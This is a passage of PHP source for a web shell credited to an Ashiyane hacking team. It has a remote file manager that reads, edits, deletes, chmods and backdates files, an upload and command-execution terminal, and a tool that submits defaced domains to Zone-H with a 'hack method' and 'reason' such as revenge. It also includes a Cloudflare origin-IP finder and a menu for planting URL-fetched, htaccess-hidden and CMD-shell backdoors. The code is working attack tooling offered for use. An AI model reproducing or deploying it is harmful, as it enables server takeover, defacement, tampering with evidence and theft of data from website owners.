  613.                                 $entry_link2=realpath($entry_link);
  614.                                 $entry_link2=str_replace("\\","/",$entry_link2);
  615.                                 echo "<a href=\"?action=explorer&dir=$entry_link2\">| $directory |</a></td>";
  616.  
  617.                                 ?>
  618.                             <td style="width:150px"><?php echo (is_file($entry_link)?size(filesize($entry_link)):'dir');?></td>
  619.                             <td style="min-width:300px;">
  620.  
  621.                                 <?php echo @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $entry_link));?>
  622.  
  623.                             </td>
  624.                             <td style="width:300px">
  625.                                 <?php
  626.  
  627.                                
  628.                                 if(strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false){
  629.                                     $ow = @posix_getpwuid(@fileowner($entry_link));
  630.                                 } else{
  631.                                     $ow['name']="???";
  632.                                 }
  633.                                
  634.                                 if(strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false){
  635.                                     $gr = @posix_getgrgid(@filegroup($entry_link));
  636.                                 }else{
  637.                                     $gr['name']="???";
  638.                                 }
  639.                                
  640.                                 echo $ow['name']?$ow['name']:@fileowner($entry_link);
  641.                                 echo "/";
  642.                                 echo $gr['name']?$gr['name']:@filegroup($entry_link);
  643.  
  644.  
  645.                                 ?>
  646.                             <td style="width:150px"><a href="?action=ff&go=perm&file=<?php echo $entry_link; ?>&dir=<?php echo $path; ?>&f=<?php echo $directory;?>#down" title="Edit Permission"><?php echo permsColor($entry_link); ?></a></td>
  647.                             <td><a href="?action=ff&go=rename&file=<?php echo urlencode($directory); ?>&dir=<?php echo $path ?>&f=<?php echo $directory;?>#down" title="Rename">R</a></td>
  648.                             <td><a href="?action=ff&go=touch&file=<?php echo $entry_link; ?>&dir=<?php echo $path; ?>&f=<?php echo $directory;?>#down" title="Touch">T</a></td>
  649.                             <td><a title="Remove" href="?action=ff&dir=<?php echo $path?>&go=delete&f=<?php echo $entry_link ?>">X</a></td>
  650.                         </tr>
  651.                     <?php
  652.                     }
  653.                     if($directory!="." && $directory!=".."){
  654.                         ?>
  655.                     <tr><td style="min-width:300px;"><?php
  656.                  
  657. echo "<a href=\"?action=explorer&dir=$entry_link\">| $directory |</a></td>";
  658.  
  659.                 ?>
  660.                 <td style="width:150px"><?php echo (is_file($entry_link)?size(filesize($entry_link)):'dir');?></td>
  661.                  <td style="min-width:300px;">
  662.                
  663.             <?php echo @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $entry_link));?>
  664.            
  665.                             </td>
  666.                  <td style="width:300px">
  667.             <?php
  668.            
  669.             if(strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false){
  670.                                     $ow = @posix_getpwuid(@fileowner($entry_link));
  671.                                 } else{
  672.                                     $ow['name']="???";
  673.                                 }
  674.                                
  675.                                 if(strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false){
  676.                                     $gr = @posix_getgrgid(@filegroup($entry_link));
  677.                                 }else{
  678.                                     $gr['name']="???";
  679.                                 }
  680.            
  681.             echo $ow['name']?$ow['name']:@fileowner($entry_link);
  682.             echo "/";
  683.             echo $gr['name']?$gr['name']:@filegroup($entry_link);
  684.            
  685.            
  686.             ?>
  687.             <td style="width:150px"><a href="?action=ff&go=perm&file=<?php echo $entry_link; ?>&dir=<?php echo $path; ?>&f=<?php echo $directory;?>#down" title="Edit Permission"><?php echo permsColor($entry_link); ?></a></td>
  688.             <td><a href="?action=ff&go=rename&file=<?php echo urlencode($directory); ?>&dir=<?php echo $path ?>&f=<?php echo $directory;?>#down" title="Rename">R</a></td>
  689.             <td><a href="?action=ff&go=touch&file=<?php echo $entry_link; ?>&dir=<?php echo $path; ?>&f=<?php echo $directory;?>#down" title="Touch">T</a></td>
  690.             <td><a title="Remove" href="?action=ff&dir=<?php echo $path?>&go=delete&f=<?php echo $entry_link ?>">X</a></td>
  691.             </tr>
  692.                 <?php
  693.                    
  694.                 }
  695.                 }
  696.                 ?>
  697.  
  698.             </td>
  699.                  </tr>
  700.             <?php
  701.            
  702.                 foreach($files_list as $file_list){
  703.                 $entry_link=$path.$file_list;
  704.                 $entry_link= ($entry_link);
  705.                
  706.                      ?><tr><td style="min-width:300px;"><?php
  707.                      echo "<a href=\"?action=ff&go=view&file=$entry_link&dir=$path&f=$file_list#down\">$file_list</a></td>"
  708.                      ;?>
  709.                      <td style="width:150px"><?php echo (is_file($entry_link)?size(filesize($entry_link)):'dir');?></td>
  710.                  <td style="min-width:300px;">
  711.                
  712.             <?php echo @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $entry_link));?>
  713.            
  714.                             </td>
  715.                  <td style="width:300px">
  716.             <?php
  717.            
  718.             if(strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false){
  719.                         $ow = @posix_getpwuid(@fileowner($entry_link));
  720.                 } else{
  721.                         $ow['name']="???";
  722.                 }
  723.                                
  724.                 if(strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false){
  725.                         $gr = @posix_getgrgid(@filegroup($entry_link));
  726.                         }else{
  727.                     $gr['name']="???";
  728.                 }
  729.            
  730.             echo $ow['name']?$ow['name']:@fileowner($entry_link);
  731.             echo "/";
  732.             echo $gr['name']?$gr['name']:@filegroup($entry_link);
  733.            
  734.            
  735.             ?>
  736.             <td style="width:150px"><a href="?action=ff&go=perm&file=<?php echo $entry_link; ?>&dir=<?php echo $path; ?>&f=<?php echo $file_list;?>#down"><?php echo permsColor($entry_link); ?></a></td>
  737.             <td><a title="Rename" href="?action=ff&go=rename&file=<?php echo urlencode($file_list); ?>&dir=<?php echo $path ?>&f=<?php echo $file_list;?>#down">R</a></td>
  738.             <td><a title="Touch" href="?action=ff&go=touch&file=<?php echo $entry_link; ?>&dir=<?php echo $path; ?>&f=<?php echo $file_list;?>#down">T</a></td>
  739.             <td><a title="Edit" href="?action=ff&go=edit&file=<?php echo $entry_link ?>&dir=<?php echo $path ?>&f=<?php echo $file_list;?>#down">E</a></td>
  740.             <td><a title="Download" href="?action=ff&dir=<?php echo $path?>&go=download&file=<?php echo $entry_link; ?>">D</a></td>
  741.             <td><a title="Remove" href="?action=ff&dir=<?php echo $path?>&go=delete&f=<?php echo $entry_link ?>">X</a></td>
  742.            
  743.             </tr>
  744.             <?php
  745.                     }
  746.                     ?>
  747.                  
  748.            
  749.  
  750.         </table>
  751.        
  752. <a name="down"></a>
  753. <table style="float:left">
  754. <tr>
  755. <?php
  756.  
  757. if(!is_writable($GLOBALS['path']))
  758. {
  759. echo "
  760. <style>
  761. .dir {
  762. background:red;
  763. }
  764. </style>
  765. ";
  766. } else{
  767. echo "
  768. <style>
  769. .dir{
  770. background:#e3e3e3;
  771. }
  772. </style>
  773. ";
  774. }
  775.  
  776. ?>
  777.  <hr>
  778.             <div class="box-box">
  779.             <div class="title"><h3>Upload File & Execute(CMD)</h3></div>
  780.             <div class="clear"></div>
  781.             <form action="" enctype="multipart/form-data" method="POST">
  782. <span>Select File: </span><input type="file" class="dir" name="userfile" style="  width: 238px;" /><input type="hidden" name="path" value="<?php echo $path ?>" /><input type="hidden" value="upload" name="type" /><input type="submit" value="Upload File" />
  783. </form><br><br>
  784.                 <form action="?action=terminal&CMD=shell#down" method="post">
  785. <span>Terminal : </span>
  786.                 <input onMouseOver="this.focus();" id="cmd" class="input dir" type="text" name="cmd" style="  width: 238px;" value="" />
  787.                 <input class="inputbutn" type="submit" value="Execute" name="submitcmd" />
  788.  
  789.     </form>
  790.         </div>
  791.             <div class="box-box">
  792.             <div class="title"><h3>File & Folder Maker</h3></div>
  793.             <div class="clear"></div>
  794.             <form action="" enctype="multipart/form-data" method="POST">
  795. <span>Make Folder: &nbsp;</span><input type="hidden" value="makefolder" name="type" /><input type="text" class="dir" name="namefolder" /><input type="submit" value="Make Folder" />
  796. </form>
  797.                 <br><br>
  798.                 <form action="" enctype="multipart/form-data" method="POST">
  799. <span>Make File: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><input type="hidden" value="makefile" name="type" /><input type="text" class="dir" name="namefile" /><input type="submit" value="Make File" />
  800. </form>
  801.         </div>
  802. </tr>
  803. </table>
  804.  
  805. <?php
  806.  
  807.  
  808. if(isset($_POST['type']) && $_POST['type']=="upload"){
  809.     if(isset($_FILES['userfile'])){
  810.         $upload_dir=$_POST['path'];
  811.         $upload_file=$upload_dir."/".basename($_FILES['userfile']['name']);
  812.        
  813.         if(move_uploaded_file($_FILES['userfile']['tmp_name'],$upload_file)){
  814.         echo "ok";
  815.         header("location: ?action=explorer&dir=$path");
  816.         }
  817.        
  818. }
  819. }
  820.  
  821. if(isset($_POST['type']) && $_POST['type']=="makefolder"){
  822.  
  823. if(isset($_POST['namefolder']) && $_POST['namefolder']!=""){
  824. $foldername=$path.$_POST['namefolder'];
  825. if(mkdir($foldername)){
  826.     echo "ok";
  827.     header("location: ?action=explorer&dir=$path");
  828. } else {
  829.     echo "can't be make folder";
  830. }
  831. } else{
  832. echo "enter folder name";
  833. }
  834. }
  835.  
  836. if(isset($_POST['type']) && $_POST['type']=="makefile"){
  837.  
  838. if(isset($_POST['namefile']) && $_POST['namefile']!=""){
  839.     $fn=$_POST['namefile'];
  840. $filename=$path.$_POST['namefile'];
  841. if(!file_exists($filename)){
  842. if(touch($filename)){
  843.  
  844. $fp = fopen($filename, "w");
  845. if ($fp) {
  846.  
  847. fclose($fp);
  848. header("location: ?action=ff&go=edit&file=$filename&dir=$path&f=$fn#down");
  849. }
  850.  
  851. }
  852.  
  853.     echo "ok";
  854.    
  855. } else {
  856.     header("location: ?action=ff&go=edit&file=$filename&dir=$path&f=$fn#down");
  857. }
  858. } else{
  859. echo "enter file name";
  860. }
  861. }
  862.  
  863. ?>
  864.  
  865.        </div>
  866.        
  867.         <?php
  868.        
  869.  
  870.     }
  871.        
  872.     if($action=="ff"){
  873.        
  874.        
  875. if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="download" && $_GET['file']!='' ){
  876.  
  877. ob_end_clean();
  878. $_GET['file'] = urldecode($_GET['file']);
  879. if(is_file($_GET['file']) && is_readable($_GET['file'])) {
  880. ob_start("ob_gzhandler", 4096);
  881.  
  882. header("Content-Disposition: attachment; filename=".basename($_GET['file']));
  883. if (function_exists("mime_content_type")) {
  884. $type = mime_content_type($_GET['file']);
  885. header("Content-Type: " . $type);
  886. } else {
  887. header("Content-Type: application/octet-stream");
  888. }
  889. $fp = fopen($_GET['file'], "r");
  890. if($fp) {
  891. while(!feof($fp))
  892. echo fread($fp, 1024);
  893. fclose($fp);
  894. }
  895. }exit;
  896.  
  897.  
  898. }
  899. ob_start();
  900. function info(){
  901.     global $path;
  902. echo "<ul class=\"info-file-info\">";
  903. $f2 = (htmlspecialchars($_GET['f']));
  904. $file2 = htmlspecialchars($_GET['file']);
  905. echo "<a href=\"?action=ff&go=rename&file=$file2&dir=$path&f=$f2#down\"><li class='active'>Name: ".htmlspecialchars($_GET['f'])."</li></a>";
  906. if(!is_dir($file2)){
  907. echo "<a href=\"?action=ff&go=view&file=$file2&dir=$path&f=$f2#down\"><li class='active'>View: ".htmlspecialchars($_GET['f'])."</li></a>";
  908. echo "<a href=\"?action=ff&go=highlight&file=$file2&dir=$path&f=$f2#down\"><li class='active'>Highlight: ".htmlspecialchars($_GET['f'])."</li></a>";
  909. echo "<a href=\"?action=ff&go=edit&file=$file2&dir=$path&f=$f2#down\"><li class='active'>Edit: ".htmlspecialchars($_GET['f'])."</li></a>";
  910. }
  911. echo "<a href=\"?action=ff&go=touch&file=$file2&dir=$path&f=$f2#down\"><li class='active'>Tuoch: ".@date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $file2))."</li></a>";
  912. echo "<li>Size: ".(is_file($_GET['file'])?size(filesize($_GET['file'])):'-')."</li>";
  913. echo "<a href=\"?action=ff&go=perm&file=$file2&dir=$path&f=$f2#down\"><li class='active'>Permissions: ".permsColor($_GET['file'])."</li></a>";
  914. if(strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false){
  915.                         $ow = @posix_getpwuid(@fileowner($_GET['file']));
  916.                 } else{
  917.                         $ow['name']="???";
  918.                 }
  919.                                
  920.                 if(strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false){
  921.                         $gr = @posix_getgrgid(@filegroup($_GET['file']));
  922.                         }else{
  923.                     $gr['name']="???";
  924.                 }  
  925. echo "<li>Owner/Group: ";
  926. echo $ow['name']?$ow['name']:@fileowner($_GET['file']);
  927. echo "/";
  928. echo $gr['name']?$gr['name']:@filegroup($_GET['file']);
  929. echo "</li>";
  930. echo "</ul>";
  931. echo "<div class=\"clear\"></div>";
  932.    
  933. }
  934. //Coded By Mahdi.Hidden ~ Ashiyane Digital Security Team
  935. ?>
  936. <div style="text-align:left">
  937. <?php
  938. info();
  939. ?>
  940. <?php
  941. if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="rename" ){
  942. $f3 = htmlspecialchars($_GET['f']);
  943. $f4 = htmlspecialchars($_GET['file']);
  944. if(isset($_POST['name'])){
  945.     $nname=$_GET['dir'].$_POST['name'];
  946.     $nn=$_POST['name'];
  947.     $oname=$_GET['dir'].$_POST['file'];
  948.     if(@rename($oname,$nname)){
  949.          header("location: ?action=ff&go=rename&dir=$path&file=$nname&f=$nn");
  950.     } else {
  951.         echo "can't rename";
  952.     }
  953. }
  954. ?>
  955. <a name="down"></a><br><span>Rename File:</span><form action="?action=ff&go=rename&dir=<?php echo htmlspecialchars($path)?>&file=<?php echo htmlspecialchars($_GET['file']);?>&f=<?php echo htmlspecialchars($_GET['f']);?>#down" method="post"><input type=text name=name value="<?php echo htmlspecialchars($_GET['f']);?>"><input type="hidden" name="file" value="<?php echo htmlspecialchars($_GET['f']);?>"><input type=submit value="Rename"></form>
  956. <?php
  957. }
  958.  
  959. if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="view" && $_GET['file']!="" ){
  960. echo '<a name="down"></a><br><span>View File:</span><pre style="border:2px solid #CE3F3F;padding:5px;margin:0;overflow: auto;background:whitesmoke;color:black">';
  961.  
  962. $fp = @fopen(($_GET['file']), 'r');
  963.  
  964. if($fp) {
  965. while( !@feof($fp) )
  966. echo htmlspecialchars(@fread($fp, 1024));
  967. @fclose($fp);
  968. }
  969. echo '</pre>';
  970.            
  971. }
  972. if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="highlight" && $_GET['file']!="" ){
  973.    
  974.  
  975. if( @is_readable($_GET['file']) ) {
  976.                 echo '<a name="down"></a><br><span>View File:</span><pre style="border:2px solid #CE3F3F;padding:5px;margin:0;overflow: auto;background:whitesmoke;">';
  977.                 $code = @highlight_file($_GET['file'],true);
  978.                 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</pre>';
  979.             }
  980.  
  981. }
  982.  
  983.         if(isset($_GET['go']) && isset($_GET['f']) && $_GET['go']=="delete" && $_GET['f']!="" ){
  984. function deleteDir($path) {
  985. $path = (substr($path,-1)=='/') ? $path:$path.'/';
  986. $dh = opendir($path);
  987. while ( ($item = readdir($dh) ) !== false) {
  988. $item = $path.$item;
  989. if ( (basename($item) == "..") || (basename($item) == ".") )
  990. continue;
  991. $type = filetype($item);
  992. if ($type == "dir")
  993. deleteDir($item);
  994. else
  995. @unlink($item);
  996. }
  997. closedir($dh);
  998. @rmdir($path);
  999. }
  1000. if(is_dir(@$_GET['f'])){
  1001. deleteDir(@$_GET['f']);
  1002. header("location: ?action=explorer&dir=$path");
  1003. } else {
  1004. @unlink(@$_GET['f']);
  1005.  
  1006. header("location: ?action=explorer&dir=$path");
  1007. }
  1008.         }
  1009.         if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="touch" && $_GET['file']!="" ){
  1010.         ?>
  1011.         <?php
  1012.    
  1013.         ?>
  1014.         <a name=\"down\"></a><br><span>Touch: </span> <form action="?action=ff&go=ttouch&dir=<?php echo htmlspecialchars($path) ?>&file=<?php echo htmlspecialchars($_GET['file']);?>&f=<?php echo htmlspecialchars($_GET['f']);?>#down" method="post">
  1015.             <input type="hidden" name="f" value="<?php echo htmlspecialchars($_GET['file']);?>" /><input type="text" name="ttouch" value="<?php echo @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . htmlspecialchars($_GET['file']))); ?>" /><input type="submit" value="Touch" />
  1016.             </form>
  1017.             <?php
  1018.  
  1019.  
  1020.         }
  1021.         if(isset($_GET['go']) && isset($_POST['ttouch']) && $_GET['go']=="ttouch" && $_POST['ttouch']!="" ){
  1022. echo "<a name=\"down\"></a><hr><br>";
  1023. $f=$_POST['f'];
  1024. $f2=$_GET['f'];
  1025. $time = strtotime($_POST['ttouch']);
  1026. if($time) {
  1027. if(!touch($_POST['f'],$time,$time))
  1028. echo 'Fail!';
  1029. else
  1030. echo 'Touched!';header("location: ?action=ff&go=touch&dir=$path&file=$f&f=$f2");
  1031.  
  1032. }
  1033.             }
  1034.         if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="perm" && $_GET['file']!="" ){
  1035.             ?>
  1036.            <a name=\"down\"></a><br><span>Change Modify: </span> <form action="?action=ff&go=chmod&file=<?php echo htmlspecialchars($_GET['file']);?>&f=<?php echo htmlspecialchars($_GET['f']); ?>&dir=<?php echo htmlspecialchars($path) ?>" method="post">
  1037.             <input type="hidden" name="f" value="<?php echo htmlspecialchars($_GET['file']);?>" /><input type="hidden" name="f2" value="<?php echo htmlspecialchars($_GET['f']);?>" /><input type="text" name="perm" value="<?php echo substr(sprintf('%o', fileperms(htmlspecialchars($_GET['file']))),-4);?>" /><input type="submit" value="Change Prem" />
  1038.             </form>
  1039.             <?php
  1040.         }
  1041.         if(isset($_GET['go']) && isset($_POST['f']) && $_GET['go']=="chmod" && $_POST['f']!="" ){
  1042.             $f=$_POST['f'];
  1043.             $f2=$_POST['f2'];
  1044.            
  1045. if(!empty($_POST['perm']) ) {
  1046. $perms = 0;
  1047. for($i=strlen($_POST['perm'])-1;$i>=0;--$i)
  1048. $perms += (int)$_POST['perm'][$i]*pow(8, (strlen($_POST['perm'])-$i-1));
  1049. if(!@chmod($f, $perms))
  1050. echo '<font color="#FFFFFF"><b>Can\'t set permissions!</b></font>';
  1051. }
  1052. echo '<font color="#FFFFFF"><b>OK !</b></font>';
  1053. header("location: ?action=ff&go=perm&dir=$path&file=$f&f=$f2");
  1054.  
  1055.  
  1056.         }
  1057.        
  1058.        
  1059.         if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="edit" && $_GET['file']!="" ){
  1060.         echo "<a name=\"down\"></a>";  
  1061. $f=htmlspecialchars($_GET['file']);
  1062. if( !is_writable(htmlspecialchars($_GET['file']))) {
  1063. echo 'File isn\'t writeable';
  1064. exit;
  1065. }
  1066. if(!empty($_POST['etext']) ) {
  1067. $time = @filemtime(htmlspecialchars($_GET['file']));
  1068. $_POST['text'] = substr($_POST['text'],0);
  1069. $fp = @fopen(htmlspecialchars($_GET['file']),"w");
  1070. if($fp) {
  1071. @fwrite($fp,$_POST['text']);
  1072. @fclose($fp);
  1073. echo 'Saved!';
  1074. @touch($_GET['file'],$time,$time);
  1075. }
  1076. }
  1077. $ff=htmlspecialchars($_GET['file']);
  1078. $fff=htmlspecialchars($_GET['f']);
  1079. echo "<br><span>Edit File: </span><form action=\"?action=ff&go=edit&file=$f&dir=$path&file=$ff&f=$fff#down\" method=\"post\"><textarea name=\"text\" style=\"width:800px;height:400px\">";
  1080. $fp = @fopen($_GET['file'], 'r');
  1081. if($fp) {
  1082. while( !@feof($fp) )
  1083. echo htmlspecialchars(@fread($fp, 1024));
  1084. @fclose($fp);
  1085. }
  1086. echo '</textarea><input type=submit value="Edit" name="etext"></form>';
  1087.         }
  1088.        
  1089.        
  1090. ?>
  1091.  
  1092. </div>
  1093.         <?php
  1094.        
  1095.     }
  1096.    
  1097.    
  1098. if($action=="zoneh"){
  1099.         ?><br />
  1100.         <div class="zoneh">
  1101.         <center>
  1102.         <form action="?action=zoneh&submit=send&dir=<?php echo htmlspecialchars($path) ?>" method="post">
  1103. <span>Notifier: </span><input name="defacer" size="67" id="text" value="Ashiyane Digital Security Team" type="text"><br />
  1104. <span>Select Hack Method: </span><select name="hackmode">
  1105. <option value="">--------SELECT--------</option>
  1106. <option value="1" >known vulnerability (i.e. unpatched system)</option>
  1107. <option value="2" >undisclosed (new) vulnerability</option>
  1108. <option value="3" >configuration / admin. mistake</option>
  1109. <option value="4" >brute force attack</option>
  1110. <option value="5" >social engineering</option>
  1111. <option value="6" >Web Server intrusion</option>
  1112. <option value="7" >Web Server external module intrusion</option>
  1113. <option value="8" >Mail Server intrusion</option>
  1114. <option value="9" >FTP Server intrusion</option>
  1115. <option value="10" >SSH Server intrusion</option>
  1116. <option value="11" >Telnet Server intrusion</option>
  1117. <option value="12" >RPC Server intrusion</option>
  1118. <option value="13" >Shares misconfiguration</option>
  1119. <option value="14" >Other Server intrusion</option>
  1120. <option value="15" >SQL Injection</option>
  1121. <option value="16" >URL Poisoning</option>
  1122. <option value="17" >File Inclusion</option>
  1123. <option value="18" >Other Web Application bug</option>
  1124. <option value="19" >Remote administrative panel access through bruteforcing</option>
  1125. <option value="20" >Remote administrative panel access through password guessing</option>
  1126. <option value="21" >Remote administrative panel access through social engineering</option>
  1127. <option value="22" >Attack against the administrator/user (password stealing/sniffing)</option>
  1128. <option value="23" >Access credentials through Man In the Middle attack</option>
  1129. <option value="24" >Remote service password guessing</option>
  1130. <option value="25" >Remote service password bruteforce</option>
  1131. <option value="26" >Rerouting after attacking the Firewall</option>
  1132. <option value="27" >Rerouting after attacking the Router</option>
  1133. <option value="28" >DNS attack through social engineering</option>
  1134. <option value="29" >DNS attack through cache poisoning</option>
  1135. <option value="30" >Not available</option>
  1136. <option value="31" >Cross-Site Scripting</option>
  1137. </select>
  1138. <br />
  1139. <span>Select The Reason: </span><select name="reason">
  1140. <option value="">--------SELECT--------</option>
  1141. <option
  1142. value="1" >Heh...just for fun!</option>
  1143. <option value="2" >Revenge against that website</option>
  1144. <option value="3" >Political reasons</option>
  1145. <option value="4" >As a challenge</option>
  1146. <option value="5" >I just want to be the best defacer</option>
  1147. <option value="6" >Patriotism</option>
  1148. <option value="7" >Not available</option>
  1149. </select><br />
  1150. <textarea name="domains" cols="90" rows="20" placeholder="Domains..."></textarea>
  1151. <br />
  1152. <input type="submit" value="send" />
  1153. </form>
  1154.  
  1155. </center>
  1156. <?php
  1157.  
  1158.  
  1159. if(isset($_REQUEST['submit']) && $_REQUEST['submit']=="send") {
  1160.  
  1161. $defacer= $_REQUEST['defacer'];
  1162. $hackmode= $_REQUEST['hackmode'];
  1163. $reason= $_REQUEST['reason'];
  1164. $domains= $_REQUEST['domains'];
  1165. $domains_list=explode("\n",$domains);
  1166.  
  1167. if (empty($defacer))
  1168. {
  1169. die ("<center><b><font color =\"#FF0000\">You Must Fill The Notifier Name</font></b></center>");
  1170. }
  1171. elseif($hackmode == "")
  1172. {
  1173. die("<center><b><font color =\"#FF0000\">You Must Select The Method</b></font></center>");
  1174. }
  1175. elseif($reason == "")
  1176. {
  1177. die("<center><b><font color =\"#FF0000\">You Must Select The Reason</b></font></center>");
  1178. }
  1179. elseif(empty($domains))
  1180. {
  1181. die("<center><b><font color =\"#FF0000\">You Must Enter The Sites List<font></b></center>");
  1182. }
  1183.  
  1184.  
  1185.     for($i=0;$i<count($domains_list);$i++) {
  1186.        
  1187.         if(substr($domains_list[$i], 0, 4) != "http")
  1188.         {
  1189.         $domains_list[$i] = "http://".$domains_list[$i];
  1190.         }
  1191.     $postVars=array("defacer"=>$defacer,"hackmode"=>$hackmode,"reason"=>$reason,"domain1"=>$domains_list[$i]);
  1192.  
  1193.     $curl = curl_init();
  1194.     curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  1195.     curl_setopt($curl,CURLOPT_URL,'http://www.zone-h.com/notify/single');
  1196.     curl_setopt($curl,CURLOPT_SSL_VERIFYPEER, FALSE);  
  1197.     curl_setopt($curl,CURLOPT_TIMEOUT, 120);
  1198.     curl_setopt($curl,CURLOPT_POST,TRUE);
  1199.     curl_setopt($curl,CURLOPT_POSTFIELDS, $postVars);
  1200.     $a = curl_exec($curl);  
  1201.     curl_close($curl);
  1202. }
  1203.     echo "<pre style=\"margin-top:5px\"><br><center><font color =\"#00A220\"><b>Sending Sites To Zone-H Has Been Completed Successfully !!!</b><font></center>";
  1204.  
  1205. }
  1206.  
  1207.  
  1208.  
  1209. ?>
  1210. </div>
  1211.        
  1212.         <?php
  1213.     }
  1214.    
  1215.     if($action=="cloudflare"){
  1216.         ?>
  1217.         <br>
  1218. <center>
  1219. <b>Cloud Flare Bypasser</b>
  1220. <form action="?action=cloudflare&dir=<?php echo htmlspecialchars($path);?>" method="post">
  1221. <p><br><input type='text' size=30 name='url' placeholder="Site.com">
  1222. <input type='submit' name='submit' value='>>' />
  1223. </p>
  1224. </form>
  1225. </center>
  1226.        
  1227.         <?php
  1228.        
  1229.        
  1230.         if(isset($_POST['submit']) && $_POST['submit'] == '>>' && isset($_POST['url']) && !empty($_POST['url'])){
  1231.         function is_ipv4($ip)
  1232.         {
  1233.             return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
  1234.         }
  1235.         function getipCloudFlare($url){
  1236.             $url = "http://www.cloudflare-watch.org/cgi-bin/cfsearch.cgi";
  1237.             $login_data = "cfS=$url";
  1238.             $login = curl_init();
  1239.             curl_setopt($login, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0');
  1240.             curl_setopt($login, CURLOPT_TIMEOUT, 40);
  1241.             curl_setopt($login, CURLOPT_RETURNTRANSFER, 1);
  1242.             curl_setopt($login, CURLOPT_URL, $url);
  1243.             curl_setopt($login, CURLOPT_HEADER, 1);
  1244.             curl_setopt($login, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  1245.             curl_setopt($login, CURLOPT_FOLLOWLOCATION, 1);
  1246.             curl_setopt($login, CURLOPT_POST, 1);
  1247.             curl_setopt($login, CURLOPT_POSTFIELDS, $login_data);
  1248.             $content= curl_exec($login);
  1249.             if (preg_match("/<UL><LI>(.*?)<\/UL>/",$content,$find)){
  1250.                 return $find[1];
  1251.             }
  1252.             else {
  1253.                 return 'Error';
  1254.             }
  1255.             curl_close($login);
  1256.         }
  1257.         $me = $argv[0];
  1258.         $url = $_POST['url'];
  1259.         if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){
  1260.             $url = preg_replace('/^(https?):\/\//', '', $url);
  1261.             $url = "http://www.".$url;
  1262.         }
  1263.         $headers = get_headers($url, 1);
  1264.         $server = $headers['Server'];
  1265.         $subs = array('cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns1.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.');
  1266.         $count = count($subs);
  1267.         if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches))
  1268.         {
  1269.             if($matches[2] != 'www')
  1270.             {
  1271.                 $url = preg_replace('/^(https?):\/\//', '', $url);
  1272.             }
  1273.             else
  1274.             {
  1275.                 $url = explode($matches[0], $url);
  1276.                 $url = $url[1];
  1277.             }
  1278.         }
  1279.         if(is_array($server))
  1280.             $server = $server[0];
  1281.         echo '<pre style="border:2px solid #CE3F3F;padding:5px;margin:0;overflow: auto;"><br/>';
  1282.         if(preg_match('/cloudflare/i', $server))
  1283.             echo "\n[+] CloudFlare detected: {$server}\n<br>";
  1284.         else
  1285.             echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
  1286.         echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
  1287.         echo "[+] Searching for more IP addresses.\n\n<br><br>";
  1288.         for($x = 0; $x < $count; $x++)
  1289.         {
  1290.             $site = $subs[$x] . $url;
  1291.             $ip = is_ipv4(gethostbyname($site));
  1292.             if($ip == '(Null)')
  1293.                 continue;
  1294.             echo "Trying {$site}: {$ip}\n<br>";
  1295.         }
  1296.         echo "\n[+] Finished.\n<br>";
  1297.     }
  1298.     }
  1299.    
  1300.     if($action=="backdoor"){
  1301.         echo "<style>#backdoor{background: #A81F1F}</style>";
  1302.  
  1303.         ?>
  1304.        
  1305.  
  1306.  
  1307.  
  1308. <br />
  1309. <div class="body">
  1310.  
  1311. <?php
  1312.  
  1313. $list = '<ul class="backdoor">';
  1314.  
  1315. if ( !isset($_GET["bd"]) || $_GET["bd"]!=="up" )
  1316. {
  1317.     $list .= "<a href=\"?action=backdoor&bd=up&dir=$path\"><li>Upload From Computer Backdoors</li></a>";   
  1318. } else {
  1319.     $list .= '<li><span>Upload From Computer Backdoors</span></li>';   
  1320. }
  1321.  
  1322. if( !isset($_GET["bd"]) || $_GET["bd"]!=="ur" )
  1323. {
  1324.     $list .= "<a href=\"?action=backdoor&bd=ur&dir=$path\"><li>Upload From URL Backdoors</li></a>";
  1325. } else {
  1326.     $list .= '<li><span>Upload From URL Backdoors</span></li>';
  1327. }
  1328.  
  1329. if( !isset($_GET["bd"]) || $_GET["bd"]!=="ht" )
  1330. {
  1331.     $list .= "<a href=\"?action=backdoor&bd=ht&dir=$path\"><li>htaccess Hidden Shell Backdoor</li></a>";   
  1332. } else {
  1333.     $list .= '<li><span>htaccess Hidden Shell Backdoor</span></li>';   
  1334. }
  1335.  
  1336. if ( !isset($_GET["bd"]) || $_GET["bd"]!=="cs" )
  1337. {
  1338.     $list .= "<a href=\"?action=backdoor&bd=cs&dir=$path\"><li>CMD shell Backdoor</li></a>";   
  1339. } else {
  1340.     $list .= '<li><span>CMD shell Backdoor</span></li>';   
  1341. }
  1342.  
